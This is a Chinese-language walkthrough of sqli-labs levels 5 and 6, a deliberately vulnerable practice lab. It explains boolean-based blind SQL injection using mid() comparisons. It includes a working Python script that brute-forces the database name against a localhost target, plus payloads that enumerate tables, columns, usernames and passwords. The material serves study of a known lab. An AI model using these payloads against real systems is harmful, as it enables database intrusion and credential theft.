sqli-labs (less5-less6)

写在前面

三个函数mid()，substr()，left()

mid(string,start,length)  //得出字符串

sub(string,start,length)  //得出字符串

left(string,length)   //取左边

less 5

get方法单引号布尔盲注

这题跟前面最大的不同就是信息正确的话没有信息回显，只显示you are in......  但是错误的话会回显报错信息，这样的话我们要是想知道账号和密码是什么的话就要用到上面的函数了，通过字符进行对比，可以得出具体的字符是什么

这里只贴一个爆数据库的脚本，其他的也是类似的，注入语句改一改而已

#coding:utf-8
import requests
url = "http://localhost/sqli-labs-master/sqli-labs-master/Less-5/"
str = "You are in"
char = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]._"
t = requests.get(url)
database = ""
print("start!")
for i in range(1,9):
    for j in char:
        payload = {'id': "1' and mid(database(),%s,1)='%s'#"%(i,j)}
        res = requests.get(url,params=payload).text
        if str in res:
            database+=j
            print(database)
            break
print("end!")

数据库表的数目

payload = {'id': "1' and (select count(table_name) from information_schema.tables where table_schema='security' limit 0,1)=%s#"%i}

 表名

payload = {'id': "1' and mid((select table_name from information_schema.tables where table_schema='security' limit %s,1),%s,1)='%s'#"%(i,j,k)}

列数

payload = {'id': "1' and (select count(column_name) from information_schema.columns where table_name='users' limit 0,1)=%s#"%i}

列名

payload = {'id': "1' and mid((select column_name from information_schema.columns where table_name='users' limit %s,1),%s,1)='%s'#"%(i,j,k)}

值

username

payload = {'id': "1' and mid((select username from users where id=%s),%s,1)='%s'#"%(i,j,k)}

password

payload2 = {'id': "1' and mid((select password from users where id=%s),%s,1)='%s'#" % (i,j,k)}

到了这里后台用户的username和password都能拿到了

less 6

get方法双引号布尔盲注

这关跟第五关差不多，把单引号改成上引号就行了

脚本语句基本一样的就不放了